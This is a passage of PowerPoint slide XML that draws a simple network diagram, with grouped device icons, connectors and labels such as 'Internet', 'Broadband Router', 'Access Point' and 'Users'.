            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3770377" y="1414090"/>
                <a:ext cx="635403" cy="469106"/>
                <a:chOff x="3700734" y="1468613"/>
                <a:chExt cx="635403" cy="469106"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="348" name="Picture 347" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F137E6-DAEA-4380-98D5-C8373631BA8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979214" y="1560821"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="349" name="Picture 348">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3C3779-0B83-4695-B52D-11D61FA6D39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734" y="1468613"/>
                  <a:ext cx="332949" cy="469106"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp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2B06FCE6-F272-4683-8D72-2E481112D414}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3770430" y="2605256"/>
                <a:ext cx="635350" cy="480799"/>
                <a:chOff x="3700787" y="2645953"/>
                <a:chExt cx="635350" cy="480799"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="346" name="Picture 345" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56C9204-F0CF-4FC9-A863-7E9A8C56D11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979214" y="2761038"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="347" name="Picture 346">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CA84FC-5D64-4842-96DF-78D8CCC9199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787" y="2645953"/>
                  <a:ext cx="334013" cy="472298"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="337" name="Group 336">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3509333E-A393-4E0F-8FB9-5C3D6406AF69}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4547222" y="3121091"/>
                <a:ext cx="516584" cy="407466"/>
                <a:chOff x="12356405" y="3529674"/>
                <a:chExt cx="625067" cy="493035"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="344" name="Picture 343" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40F3A893-48B2-4926-99EF-99917F9F73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2624549" y="3656995"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="345" name="Picture 344">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A5F2E8-35D2-4AC9-AB7A-468C05356E8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2356405" y="3529674"/>
                  <a:ext cx="335076" cy="473363"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="338" name="Group 337">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC72F0BE-6F1C-453B-AE54-EF1037E5B9D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5181261" y="3198950"/>
                <a:ext cx="527809" cy="387691"/>
                <a:chOff x="13234215" y="2955850"/>
                <a:chExt cx="638649" cy="469106"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="342" name="Picture 341" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E43BD8-A3DC-4406-A783-32300B04AC4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3515941" y="3045000"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="343" name="Picture 342">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA78411-A78D-42EA-8782-CEE5786BB8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3234215" y="2955850"/>
                  <a:ext cx="332949" cy="469106"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="339" name="Group 338">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342B9F39-75A5-4C04-99CA-34D1D62BAD7B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5887296" y="3151560"/>
                <a:ext cx="502979" cy="390329"/>
                <a:chOff x="12913574" y="2415532"/>
                <a:chExt cx="608606" cy="472298"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="340" name="Picture 339" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BDCA75-FEFB-4995-A5F3-23671F5857B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2913574" y="2475828"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="341" name="Picture 340">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE70C985-1713-432D-A0DF-0D803F3918A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3188166" y="2415532"/>
                  <a:ext cx="334014" cy="47229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40B97449-72A6-4DEB-9D18-09FB349FCE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7643223" y="1249680"/>
            <a:ext cx="4074886" cy="2339588"/>
            <a:chOff x="7391400" y="1371600"/>
            <a:chExt cx="4074886" cy="2339588"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="352" name="Rectangle 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE44783-9290-4DB6-96CD-C3333FBA7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1400" y="1371600"/>
              <a:ext cx="4074886" cy="2313489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FFFF">
                    <a:gamma/>
                    <a:shade val="89020"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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53" name="Rectangle 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06260DF-D93B-4FBD-80AB-D985E4673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3447" y="1387541"/>
              <a:ext cx="4050792" cy="2281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54" name="Group 353">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ADF6C0B-1F25-4B58-AD49-F2E8EDAF50AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7520339" y="1410855"/>
              <a:ext cx="3827188" cy="2300333"/>
              <a:chOff x="7949080" y="1375556"/>
              <a:chExt cx="3827188" cy="2300333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="355" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088CADE0-355E-4B5E-B4C5-565276E65B3B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9063212" y="1438645"/>
                <a:ext cx="1602601" cy="1600217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6" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5252A9D-D1FE-4850-9252-00BC957A8FC9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9168039" y="1548341"/>
                <a:ext cx="1392107" cy="1390037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7" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38BB1099-CE6C-486E-AA87-83B8F62064A7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9283769" y="1668922"/>
                <a:ext cx="1170712" cy="1168971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8" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19AE52F-8FB9-4390-8174-CE7817D4DD0C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9384403" y="1789504"/>
                <a:ext cx="949317" cy="947904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9" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D277C43-BB77-429D-A708-B86C740DEC87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9500132" y="1905061"/>
                <a:ext cx="727921" cy="726838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pic>
            <p:nvPicPr>
              <p:cNvPr id="360" name="Picture 8" descr="E:\Icon Shock\CLEAN\Networking\router_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D57FEAF-3830-4D04-B7B2-17006D2D6E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97934" y="2473316"/>
                <a:ext cx="776950" cy="7769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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="361" name="Straight Connector 360">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0BED40-CF16-4077-9214-348524F4C626}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10361821" y="2241594"/>
                <a:ext cx="822960" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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D5CB9C48-1594-4DF9-A7F0-58142C957725}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8569590" y="2241256"/>
                <a:ext cx="822960" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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Straight Connector 362">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193619A9-30AB-43E7-823F-602700CFE2FB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="10361821" y="1681629"/>
                <a:ext cx="909919" cy="555338"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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BDCA8AB7-3D5B-4CFE-BD13-6A811DA7C8A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="8582467" y="1744127"/>
                <a:ext cx="778184" cy="491782"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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65" name="Picture 6" descr="E:\haja Premium\Wireless_Modem.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F8EE417-58DC-4D8F-B1D4-F3A5B44C1F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00081" y="1778863"/>
                <a:ext cx="580219" cy="58021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66" name="Picture 12" descr="X:\Web2.0 PNG Icons\Haja Roger Shutterstock\clouds-double.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68D643E-06C1-437B-99F5-00B3A669A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 cstate="print">
                <a:duotone>
                  <a:schemeClr val="bg2">
                    <a:shade val="45000"/>
                    <a:satMod val="135000"/>
                  </a:scheme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278407" y="3069779"/>
                <a:ext cx="699764" cy="455855"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/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67" name="Picture 6" descr="E:\haja Premium\Wireless_Modem.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A294A48-90C9-49F3-82E6-91AA4EDB01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94812" y="1790152"/>
                <a:ext cx="580219" cy="58021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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="368" name="Elbow Connector 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA04B83-CA45-4CFA-9A7D-339B98AEE733}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="9234904" y="2498101"/>
                <a:ext cx="475488" cy="182880"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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9" name="Elbow Connector 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{466D3AE1-4BC8-4FB0-A0E4-EFEB7DA5FD78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="10074689" y="2506537"/>
                <a:ext cx="475488" cy="182880"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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0" name="Elbow Connector 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{977B8E8B-9F82-4BE5-B7C5-8208584396CB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipV="1">
                <a:off x="8688672" y="2918019"/>
                <a:ext cx="852393" cy="155448"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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1" name="Straight Arrow Connector 370">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA40D50C-59BB-4E3B-B4E8-1CE203903222}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="9001311" y="3266128"/>
                <a:ext cx="2130552" cy="764"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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2" name="Rectangle 371">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3451B141-96DE-4AAC-A92B-21990D0CD299}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11146155" y="3460445"/>
                <a:ext cx="530915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Internet</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="373" name="Rectangle 372">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7FBD8D0-24FD-4BFC-8968-6107D56E6AA0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9564815" y="2956745"/>
                <a:ext cx="677360" cy="33855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Broadband Router</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="374" name="Rectangle 373">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863F1F27-BDC1-4DE9-80B5-6D21195461AE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8100819" y="2444501"/>
                <a:ext cx="423514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Users</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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BC30C536-D555-4DF0-B74E-7D3DD03CE805}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9334000" y="2305703"/>
                <a:ext cx="541277" cy="33855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Access Point </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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E39D18C3-F24D-4224-A58D-ACC1EBD51C93}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9898553" y="2314371"/>
                <a:ext cx="541277" cy="33855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Access Point </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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AD60F78C-B9A0-46A6-A8C7-98E79634E8E1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11271740" y="2414163"/>
                <a:ext cx="423514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Users</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="378" name="Picture 2" descr="F:\Prashant DATA\ICONS\Web2.0 PNG Icons\Globe and Internet\Globe 1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10151D1A-79DB-4F96-A699-7AC013E21D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24865" y="2961167"/>
                <a:ext cx="583734" cy="58373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379" name="Group 378">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26380800-F051-4727-85D8-7041C535365D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7949080" y="1375556"/>
                <a:ext cx="644730" cy="479923"/>
                <a:chOff x="12642764" y="2644257"/>
                <a:chExt cx="644730" cy="479923"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="388" name="Picture 387" descr="A close up of a sign&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D59232-CAB6-4209-932E-8479146D881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2944972" y="2764567"/>
                  <a:ext cx="342522" cy="353159"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="389" name="Picture 388">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5A0191-5D90-463C-9E88-74BC9F11A11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2642764" y="2644257"/>
                  <a:ext cx="351793" cy="479923"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="380" name="Group 379">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EAB4CE0-FE18-4691-908F-CE51DB270C50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7949080" y="1910740"/>
                <a:ext cx="647546" cy="528305"/>
                <a:chOff x="7716473" y="2510560"/>
                <a:chExt cx="647546" cy="528305"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="386" name="Picture 385" descr="A close up of a sign&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62BE4CCB-1052-4795-918F-8F3E4355001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 cstate="print">
                  <a:duotone>
                    <a:prstClr val="black"/>
                    <a:schemeClr val="tx2">
                      <a:tint val="45000"/>
                      <a:satMod val="400000"/>
                    </a:schemeClr>
                  </a:duoton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021497" y="2685706"/>
                  <a:ext cx="342522" cy="353159"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="387" name="Picture 386">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC3F473-EB35-4CED-B529-B94D2C4FDE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16473" y="2510560"/>
                  <a:ext cx="368584" cy="520698"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="381" name="Group 380">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAAA376-4EB5-4F49-A14C-31BC4B1752A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11195319" y="1995722"/>
                <a:ext cx="580949" cy="427055"/>
                <a:chOff x="12039895" y="1967660"/>
                <a:chExt cx="580949" cy="427055"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="384" name="Picture 383" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2044693-9898-40AB-956B-15D88236C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2039895" y="2029001"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="385" name="Picture 384">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273CF1EE-D10D-43FE-BDE4-FEA3095BB2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2332571" y="1967660"/>
                  <a:ext cx="288273" cy="424431"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="382" name="Picture 381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6829392B-B883-421A-8DBE-748DCF93F9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1202368" y="1535955"/>
                <a:ext cx="360688" cy="373125"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="383" name="Picture 382">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB0D619C-7291-4CA7-A3AE-51922D11F1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1451451" y="1515330"/>
